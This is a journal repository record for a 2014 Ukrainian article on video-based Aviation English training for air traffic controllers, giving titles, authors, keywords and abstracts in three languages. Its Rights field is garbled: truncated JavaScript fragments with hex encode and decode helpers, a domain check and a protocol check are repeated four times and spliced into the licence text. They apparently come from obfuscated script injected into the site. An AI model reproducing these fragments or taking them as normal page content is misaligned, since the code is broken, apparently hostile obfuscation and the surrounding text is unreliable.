Record Details

Навчання авіаційної англійської мови з використанням відеоматеріалів

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Навчання авіаційної англійської мови з використанням відеоматеріалів
Обучение авиационному английскому языку с использованием видеоматериалов
VIDEO BASED TEACHING OF AVIATION ENGLISH
 
Creator Petrashchuk, Olena; National Aviation University
Skypalska, Olena; National Aviation University
 
Subject
авіаційна англійська мова; відеоматеріали; мовна підготовка авіадиспетчерів; мовні вимоги ІКАО; розвиток усномовленнєвих умінь
811.111:371.3 (045)

авиационный английский; видеоматериалы; подготовка авиадиспетчеров; развитие устноречевых умений; языковые требования ИКАО
811.111:371.3 (045)

air traffic controller language training; Aviation English; ICAO language requirements; oral language skills development; video materials
811.111:371.3 (045)
 
Description Присвячено проблемі навчання авіаційної англійської мови на базі відеоматеріалів. Показано, що використання відеоматеріалів сприяє забезпеченню узгодженості з новими мовними вимогами ІКАО як частини покращеноїпрофесійної кваліфікації. Розглянуто переваги та труднощі, пов’язані з використанням відеоматеріалів ваудиторії під час мовної підготовки майбутніх авіадиспетчерів. Наведено зразок методичної розробки відеоматеріалів в авіаційному контексті.
Рассмотрена проблема обучения авиационному английскому языку на базе видеоматериалов. Показано, чтоиспользование видеоматериалов способствует обеспечению согласованности с новыми языковымитребованиями ИКАО как части улучшенной профессиональной квалификации. Приведены преимущества итрудности, связанные с использованием видеоматериалов в аудитории во время языковой подготовки будущих авиадиспетчеров. Представлен образец методической разработки видеоматериалов в авиационном контексте
The article deals with teaching Aviation English using video. Compliance with new ICAO languagerequirements has become part of the professional qualification. The article looks at some benefits and potentialchallenges associated with using video materials in the classroom during language training of air traffic controllers(ab initio).
 
Publisher National Aviation University
 
Contributor


 
Date 2014-09-23
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/7577
10.18372/2306-1472.60.7577
 
Source Proceedings of the National Aviation University; Том 60, № 3 (2014); 109-115
Вестник Национального авиационного университета; Том 60, № 3 (2014); 109-115
Вісник Національного Авіаційного Університету; Том 60, № 3 (2014); 109-115
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ